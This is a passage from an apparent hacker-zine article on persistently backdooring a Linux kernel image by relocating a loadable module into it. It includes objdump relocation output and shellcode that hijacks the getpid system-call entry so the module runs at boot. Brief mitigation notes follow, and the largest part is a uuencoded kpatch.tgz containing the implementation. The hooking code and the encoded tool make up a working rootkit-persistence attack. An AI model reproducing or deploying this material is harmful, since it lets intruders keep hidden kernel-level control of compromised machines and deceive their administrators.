+..
+RELOCATION RECORDS FOR [.text]:
+OFFSET   TYPE              VALUE
+00000004 R_386_32          .rodata
+00000009 R_386_32          .rodata
+0000000e R_386_PC32        printk
+
+[root@linux-jbtzhm test]# objdump -d module.o
+
+test.o:     file format elf32-i386
+
+Disassembly of section .text:
+
+00000000 <init_module>:
+   0:   55                      push   %ebp
+   1:   89 e5                   mov    %esp,%ebp
+   3:   68 00 00 00 00          push   $0x0
+   8:   68 0d 00 00 00          push   $0xd
+   d:   e8 fc ff ff ff          call   e <init_module+0xe>
+  12:   31 c0                   xor    %eax,%eax
+  14:   c9                      leave
+  15:   c3                      ret
+
+The object file structure is clear from the output of objdump.There are 
+three entries in the text relocation section,and the offset shows the place
+should be corrected.For the printk symbol,the type is R_386_PC32 which 
+means relative call instruction(R_386_32 means absolute address).So after 
+relocation the value of "fc ff ff ff" in the text that calls printk will 
+be put out in the right value.
+
+However,it is more complex than what can be described about the relocation,
+and more information about it is available from ELF specifications.About 
+the implementation of relocation Silvio had written many codes in his 
+paper-RUNTIME KERNEL KMEM PATCHING-.Many lines are refereed from it and some
+operations are added about uninitialized static and SHN_COMMON variables.
+
+
+-- [ 5 - Make it autorun when reboot
+
+After the above steps the new kernel appears like this
+[modified kernel][all zero dummy][relocated module]
+
+But the module don't have chance to be called,so the kernel running path 
+has to be changed to call the function init_module in lkm.My method is 
+adding some code between the dummy data and the module and changing the 
+value of sys_call_table[SYS_getpid] to the code.Many programs (like init)
+will call getpid when machine reboots,then the code will be called.
+
+ char init_code[]={
+"\xE8\x00\x00\x00\x00"          //call init_module
+"\xC7\x05\x00\x00\x00\x00\x11\x11\x11\x11" //restore orig_getpid
+"\xE8\x11\x11\x11\x11"          //call orig_getpid
+"\xC3"                          //ret
+};
+
+All the relative and absolute addr is written by wrong value,but it is not
+necessary to worry about that.When relocating the module the accurate
+values about those address can be also make certain.
+
+So the final new kernel had come int being.
+[modified kernel][all zero dummy][init_code][relocated module]
+
+Then the new kernel image followed the steps in Makefile is generated.Now
+a new kernel patched by the module is available.
+
+--[ 6 - Possible solutions
+
+Deleting the /boot/System.map is the easiest way to prevent someone from
+using this program without any modification.However Silvio had shown some 
+ways to generate the kernel symbol list from kernel.So it is not the final
+solutions.Adding some module to prevent kernel image from being modified is 
+not a bad idea,but the precondition is the system should support the module.
+
+When a kernel image was patched,its size and checksum could be detected,
+so some function can be added to cheat the manager,but I don't have time
+to do that.If you have more ideas please don't hesitate to contact me.
+
+--[ 7 - Conclusion
+
+Now it is clear that it is so easy to patch the kernel image.If the host
+is compromised,nothing should be trusted,even if your own eyes.Halting the
+machine and mounting the disk to another host is a good idea.
+
+This paper is just for education.Please don't use it for other purposesA.
+Sorry about my poor English and the dirty code of my program.Everything
+should be better if I have more time.Though it could work well at
+redhat 7.2,there maybe some problems if moved to all versions of linux
+kernel.However,time is not enough for the tests on all kinds of
+environment.
+
+--[ 8 - References
+
+ [1] Silvio's article describing run-time kernel patching (System.map)
+     [http://www.big.net.au/~silvio/runtime-kernel-kmem-patching.txt]
+
+ [2]  "Complete Linux Loadable Kernel Modules. The definitive guide
+      for hackers, virus coders and system administrators."
+     [http://www.thehackerschoice.com/papers]
+
+ [3] <<Linux Kernel:Scenarios and Analysis>> by Mao Decao and Hu Ximing
+
+ [4] linux kernel source
+     [http://www.kernel.org]
+
+ [5] Linux Kernel 2.4 Internals
+     [http://www.moses.uklinux.net/patches/lki.html]
+ 
+At last,many thanks to Silvio the source about the relocation.Also to my
+co-worker lgx who give me many good advise when i debug the program.At
+the same time i extend special thanks to Hou Hanshu who help me correct
+much grammar mistakes in english.
+
+--[ 9 - Appendix: The implementation
+
+
+begin 644 kpatch.tgz
+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
